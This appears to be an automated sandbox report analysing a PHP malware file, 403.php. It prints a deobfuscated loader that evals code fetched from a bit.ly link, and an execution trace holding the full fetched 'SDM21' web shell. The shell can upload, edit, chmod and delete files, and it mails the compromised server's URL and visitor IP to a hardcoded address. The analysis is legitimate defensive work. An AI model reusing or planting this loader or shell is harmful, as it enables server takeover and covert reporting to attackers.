PHP Malware Analysis

403.php

md5: fe951c6fa7503942c782665af9461bb9

Jump to:

Screenshot


Attributes

Emails

Environment

Execution

Files

Input

URLs
  • http://localhost/uploads/403.php (Traces)
  • https://bit.ly/3iLHOKD (Deobfuscated, Original, Traces)
  • https://fonts.googleapis.com/css?family=Kelly+Slab (HTML, Traces)
  • https://i.ibb.co/M1JCKDN/images-jpeg.jpg (HTML, Traces)
  • https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css (HTML, Traces)
  • https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg (HTML, Traces)


Deobfuscated PHP code

 <?php 
echo null;
/********/
/*******/
/********/
@eval("?>" . file_get_contents("https://bit.ly/3iLHOKD"));
/**/

Execution traces

data/traces/fe951c6fa7503942c782665af9461bb9_trace-1676262346.0056.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:26:11.903441]
1	0	1	0.000179	393512
1	3	0	0.000229	393824	{main}	1		/var/www/html/uploads/403.php	0	0
2	4	0	0.000246	393824	file_get_contents	0		/var/www/html/uploads/403.php	1	1	'https://bit.ly/3iLHOKD'
2	4	1	0.197970	413112
2	4	R			' <?php\r\n// --- Create by SDM21\r\n// --- php shell \r\n\r\nerror_reporting(0); \r\nsession_start();\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\n\r\necho \'<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\r\n<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\r\n<link'
2	5	0	0.198421	481040	eval	1	'?> <?php\r\n// --- Create by SDM21\r\n// --- php shell \r\n\r\nerror_reporting(0); \r\nsession_start();\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\n\r\necho \'<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\r\n<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\r\n<link rel="icon" type="image/jpg" href="https://i.ibb.co/M1JCKDN/images-jpeg.jpg"/>\r\n<title></title>\r\n<center>\r\n\r\n<style type="text/css">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackground-color: black;\r\n\tcolor: white;\r\n\t}\r\n#content tr:hover{\r\n\tbackground-color: #0200FF;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\n#content .first{\r\n\tcolor: #000000;\r\n\tbackground-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);\r\n\t}\r\n#content .first:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 1px #339900;\r\n\t}\r\ntable, th, td {\r\n\t\tborder-collapse:collapse;\r\n\t\tpadding: 5px;\r\n\t\tcolor: white;\r\n\t\t}\r\n.table_home, .th_home, .td_home { \r\n\t\tcolor:grey;\r\n\t\tborder: 2px solid grey;\r\n\t\tpadding: 7px;\r\n\t\t}\r\na{\r\n\tfont-size: 19px;\r\n\tcolor: #ffffff;\r\n\ttext-decoration: none;\r\n\t}\r\na:hover{\r\n\tcolor: white;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\ninput,select,textarea{\r\n\tborder: 1px #ffffff solid;\r\n\t-moz-border-radius: 5px;\r\n\t-webkit-border-radius:5px;\r\n\tborder-radius:5px;\r\n\t}\r\n.close {\r\n\toverflow: auto;\r\n\tborder: 1px solid red;\r\n\tbackground: red;\r\n\tcolor: white;\r\n\t}\r\n.r {\r\n\tfloat: right;\r\n\ttext-align: right;\r\n\t}\r\n</style>\r\n\r\n<a href="?"><h1 style="font-family: Kelly Slab; font-size: 35px; color: white;">\r\nSDM21 SHELL</h1></a>\r\n</HEAD>\r\n<BODY>\r\n\r\n<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">\r\n<tr><td>\';\r\necho "<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-user\'></i> <td>: <font color=\'lime\'>".$_SERVER[\'REMOTE_ADDR\']."<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-desktop\'></i> <td>: <font color=\'lime\'>".gethostbyname($_SERVER[\'HTTP_HOST\'])." / ".$_SERVER[\'SERVER_NAME\']."<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-hdd-o\'></i> <td>: <font color=\'lime\'>".php_uname()."</font></tr></td></table>";\r\n\r\necho \'<table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">\r\n<tr align="center"><td align="center"><br>\';\r\n\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<i class="fa fa-folder-o"></i> : <a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\n\r\n\r\n//upload\r\necho \'<br><br><br><font color="yellow"><form enctype="multipart/form-data" method="POST">\r\nUpload File: <input type="file" name="file" style="color:cyan;border:2px solid red;" required/></font>\r\n<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: yellow;border:2px solid red;border-radius:5px"/>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<br><br><font color="lime">UPLOAD SUCCES !!!!</font><br/>\';\r\n}else{\r\necho \'<script>alert("File Gagal Diupload !!")</script>\';\r\n}\r\n}\r\n\r\necho \'</form></td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>files >> ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\' <textarea  style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1200px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\n\r\n//Chmod\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<br><br><font color="lime">CHANGE PERMISSION SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Change Permission Gagal !!")</script>\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" style="width:80px; height: 30px;"/>\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>\r\n</form>\';\r\n}\r\n\r\n//rename folder\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\t echo \'<form action="?option&path=\'.$cwd.\'&opt=delete&type=buat" method="POST">\r\nNew Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>\r\n<input type="hidden" name="path" value="\'.$cwd.\'">\r\n<input type="hidden" name="opt" value="delete">\r\n<input type="submit" value="Go" style="width:100px; height: 30px;"/>\r\n</form>\';\r\n}\r\n\r\n//rename file\r\nelseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<br><br><font color="lime">CHANGE NAME SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Change Name Gagal !!")</script>\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Lanjut" style="height:30px;" />\r\n</form>\';\r\n}\r\n\r\n//edit file\r\nelseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<br><br><font color="lime">EDIT FILE SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Edit File Gagal !!")</script>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1000px;">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br /><center>\';\r\n\r\n//delete dir\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<br><br><font color="lime">DELETE DIR SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Delete Dir Gagal !!")</script>>\';\r\n}\r\n}\r\n\r\n//delete file\r\nelseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<br><br><font color="lime">DELETE FILE SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Delete File Gagal !!")</script>\';\r\n}\r\n}\r\n}\r\n\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'jakbarsec@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>\r\n<?php\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \'<div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<th><center>Name</center></th>\r\n<th><center>Size</center></th>\r\n<th><center>Perm</center></th>\r\n<th><center>Options</center></th>\r\n</tr>\r\n<tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr>\r\n<td class=td_home><img src=\'data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=\'><a href=\\"?path=$path/$dir\\"> $dir</a></td>\r\n<td class=td_home><center>DIR</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#57FF00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="#FF0004">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\" style=\\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\">\r\n<option value=\\"Action\\">Action</option>\r\n<option value=\\"delete\\">Delete</option>\r\n<option value=\\"chmod\\">Chmod</option>\r\n<option value=\\"rename\\">Rename</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\r\n<input type=\\"submit\\" value=\\">\\" style=\\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\"/>\r\n</form></center></td>\r\n</tr>";\r\n}\r\n\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "<tr>\r\n<td class=td_home><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\'><a href=\\"?filesrc=$path/$file&path=$path\\"> $file</a></td>\r\n<td class=td_home><center>".$size."</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#57FF00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="#FF0004">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\" style=\\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\">\r\n<option value=\\"Action\\">Action</option>\r\n<option value=\\"delete\\">SDM Hapus</option>\r\n<option value=\\"edit\\">SDM Edit</option>\r\n<option value=\\"rename\\">SDM Ganti Nama</option>\r\n<option value=\\"chmod\\">SDM Chmod</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\r\n<input type=\\"submit\\" value=\\">\\" style=\\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\"/>\r\n</form></center></td>\r\n</tr>";\r\n}\r\n\r\necho \'</table>\r\n</div>\';\r\n}\r\n\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>\r\n<center>\r\n<br>\r\n<font size="2px" color="white">Copyright &#169; <script type=\'text/javascript\'>var creditsyear = new Date();document.write(creditsyear.getFullYear()); </script> SDM21. All Right Reserved.</font>\r\n</center>\r\n</BODY>\r\n</HTML>'	/var/www/html/uploads/403.php	1	0
3	6	0	0.198724	481040	error_reporting	0		/var/www/html/uploads/403.php(1) : eval()'d code	5	1	0
3	6	1	0.198742	481080
3	6	R			0
3	7	0	0.198755	481040	session_start	0		/var/www/html/uploads/403.php(1) : eval()'d code	6	0
3	7	1	0.198819	481792
3	7	R			TRUE
3	8	0	0.198835	481792	get_magic_quotes_gpc	0		/var/www/html/uploads/403.php(1) : eval()'d code	8	0
3	8	1	0.198849	481792
3	8	R			FALSE
3	9	0	0.198864	482016	gethostbyname	0		/var/www/html/uploads/403.php(1) : eval()'d code	87	1	'localhost'
3	9	1	0.198900	482096
3	9	R			'127.0.0.1'
3	10	0	0.198917	482112	php_uname	0		/var/www/html/uploads/403.php(1) : eval()'d code	88	0
3	10	1	0.198932	482224
3	10	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3	11	0	0.198951	481792	getcwd	0		/var/www/html/uploads/403.php(1) : eval()'d code	96	0
3	11	1	0.198965	481840
3	11	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	96	$path = '/var/www/html/uploads'
3	12	0	0.198994	481840	str_replace	0		/var/www/html/uploads/403.php(1) : eval()'d code	98	3	'\\'	'/'	'/var/www/html/uploads'
3	12	1	0.199010	481936
3	12	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	98	$path = '/var/www/html/uploads'
3	13	0	0.199035	481840	explode	0		/var/www/html/uploads/403.php(1) : eval()'d code	99	2	'/'	'/var/www/html/uploads'
3	13	1	0.199050	482416
3	13	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	99	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	101	$id = 0
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	103	$a = TRUE
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	101	$id = 1
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i = 0
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	101	$id = 2
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i = 0
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	101	$id = 3
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i = 0
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	101	$id = 4
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i = 0
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	109	$i++
3	14	0	0.199306	482344	ini_set	0		/var/www/html/uploads/403.php(1) : eval()'d code	228	2	'output_buffering'	0
3	14	1	0.199321	482416
3	14	R			FALSE
3	15	0	0.199335	482344	ini_set	0		/var/www/html/uploads/403.php(1) : eval()'d code	229	2	'display_errors'	0
3	15	1	0.199350	482416
3	15	R			''
3	16	0	0.199363	482344	set_time_limit	0		/var/www/html/uploads/403.php(1) : eval()'d code	230	1	0
3	16	1	0.199379	482408
3	16	R			FALSE
3	17	0	0.199392	482376	ini_set	0		/var/www/html/uploads/403.php(1) : eval()'d code	231	2	'memory_limit'	'64M'
3	17	1	0.199407	482480
3	17	R			'128M'
3	18	0	0.199420	482376	header	0		/var/www/html/uploads/403.php(1) : eval()'d code	232	1	'Content-Type: text/html; charset=UTF-8'
3	18	1	0.199437	482552
3	18	R			NULL
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	233	$tujuanmail = 'jakbarsec@gmail.com'
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	234	$x_path = 'http://localhost/uploads/403.php'
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	235	$pesan_alert = 'fix http://localhost/uploads/403.php :p *IP Address : [ 127.0.0.1 ]'
3	19	0	0.199490	482720	mail	0		/var/www/html/uploads/403.php(1) : eval()'d code	236	4	'jakbarsec@gmail.com'	'LOGGER'	'fix http://localhost/uploads/403.php :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
3	19	1	0.200393	482864
3	19	R			FALSE
3	20	0	0.200430	482680	scandir	0		/var/www/html/uploads/403.php(1) : eval()'d code	240	1	'/var/www/html/uploads'
3	20	1	0.200500	483296
3	20	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '403.php', 4 => 'data', 5 => 'prepend.php']
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	240	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '403.php', 4 => 'data', 5 => 'prepend.php']
3	21	0	0.200554	483264	getcwd	0		/var/www/html/uploads/403.php(1) : eval()'d code	241	0
3	21	1	0.200568	483312
3	21	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	241	$pa = '/var/www/html/uploads'
3	22	0	0.200595	483360	is_dir	0		/var/www/html/uploads/403.php(1) : eval()'d code	252	1	'/var/www/html/uploads/.'
3	22	1	0.200612	483424
3	22	R			TRUE
3	23	0	0.200626	483392	is_dir	0		/var/www/html/uploads/403.php(1) : eval()'d code	252	1	'/var/www/html/uploads/..'
3	23	1	0.200641	483440
3	23	R			TRUE
3	24	0	0.200654	483400	is_dir	0		/var/www/html/uploads/403.php(1) : eval()'d code	252	1	'/var/www/html/uploads/.htaccess'
3	24	1	0.200670	483440
3	24	R			FALSE
3	25	0	0.200683	483400	is_dir	0		/var/www/html/uploads/403.php(1) : eval()'d code	252	1	'/var/www/html/uploads/403.php'
3	25	1	0.200698	483440
3	25	R			FALSE
3	26	0	0.200711	483400	is_dir	0		/var/www/html/uploads/403.php(1) : eval()'d code	252	1	'/var/www/html/uploads/data'
3	26	1	0.200726	483440
3	26	R			TRUE
3	27	0	0.200740	483400	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	257	1	'/var/www/html/uploads/data'
3	27	1	0.200757	483440
3	27	R			TRUE
3	28	0	0.200770	483400	perms	1		/var/www/html/uploads/403.php(1) : eval()'d code	259	1	'/var/www/html/uploads/data'
4	29	0	0.200783	483400	fileperms	0		/var/www/html/uploads/403.php(1) : eval()'d code	320	1	'/var/www/html/uploads/data'
4	29	1	0.200796	483440
4	29	R			16895
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	320	$perms = 16895
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	336	$info = 'd'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	349	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	350	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	353	$info .= 'x'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	356	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	357	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	360	$info .= 'x'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	363	$info .= 'r'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	364	$info .= 'w'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	367	$info .= 'x'
3	28	1	0.200975	483440
3	28	R			'drwxrwxrwx'
3	30	0	0.200989	483400	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	260	1	'/var/www/html/uploads/data'
3	30	1	0.201007	483440
3	30	R			TRUE
3	31	0	0.201027	483376	is_dir	0		/var/www/html/uploads/403.php(1) : eval()'d code	252	1	'/var/www/html/uploads/prepend.php'
3	31	1	0.201044	483424
3	31	R			FALSE
3	32	0	0.201058	483368	is_file	0		/var/www/html/uploads/403.php(1) : eval()'d code	280	1	'/var/www/html/uploads/.'
3	32	1	0.201073	483392
3	32	R			FALSE
3	33	0	0.201086	483360	is_file	0		/var/www/html/uploads/403.php(1) : eval()'d code	280	1	'/var/www/html/uploads/..'
3	33	1	0.201101	483408
3	33	R			FALSE
3	34	0	0.201113	483368	is_file	0		/var/www/html/uploads/403.php(1) : eval()'d code	280	1	'/var/www/html/uploads/.htaccess'
3	34	1	0.201128	483408
3	34	R			TRUE
3	35	0	0.201140	483368	filesize	0		/var/www/html/uploads/403.php(1) : eval()'d code	281	1	'/var/www/html/uploads/.htaccess'
3	35	1	0.201153	483408
3	35	R			64
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	281	$size = 0.0625
3	36	0	0.201177	483312	round	0		/var/www/html/uploads/403.php(1) : eval()'d code	282	2	0.0625	3
3	36	1	0.201191	483384
3	36	R			0.063
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	282	$size = 0.063
2		A						/var/www/html/uploads/403.php(1) : eval()'d code	286	$size = '0.063 KB'
3	37	0	0.201228	483408	is_writable	0		/var/www/html/uploads/403.php(1) : eval()'d code	293	1	'/var/www/html/uploads/.htaccess'
3	37	1	0.201244	483448
3	37	R			FALSE
3	38	0	0.201257	483408	is_readable	0		/var/www/html/uploads/403.php(1) : eval()'d code	294	1	'/var/www/html/uploads/.htaccess'
3	38	1	0.201272	483448
3	38	R			TRUE
3	39	0	0.201285	483408	perms	1		/var/www/html/uploads/403.php(1) : eval()'d code	295	1	'/var/www/html/uploads/.htaccess'
4	40	0	0.201298	483408	fileperms	0		/var/www/html/uploads/403.php(1) : eval()'d code	320	1	'/var/www/html/uploads/.htaccess'
4	40	1	0.201311	483448
4	40	R			33188
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	320	$perms = 33188
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	330	$info = '-'
3		A						/var/www/html/uploads/403.php(1) : eval()'d code	349	$info .= 'r'
